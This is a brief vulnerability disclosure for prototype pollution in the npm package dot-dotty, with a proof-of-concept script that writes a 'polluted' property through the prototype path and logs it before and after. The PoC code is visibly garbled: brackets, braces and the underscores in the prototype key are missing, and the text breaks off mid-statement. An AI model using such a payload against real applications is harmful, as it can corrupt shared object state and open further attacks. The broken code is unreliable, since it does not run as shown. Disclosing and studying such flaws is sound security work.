Prototype Pollution in kettek/dot-dotty

Description dot-dotty is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js const DotDotty = require'dot-dotty' let obj = a: 1 let dot = DotDottyobj console.log"Before : " + .polluted; dot'proto.polluted' = 'Yes! Its Polluted'; console.log"After : " +...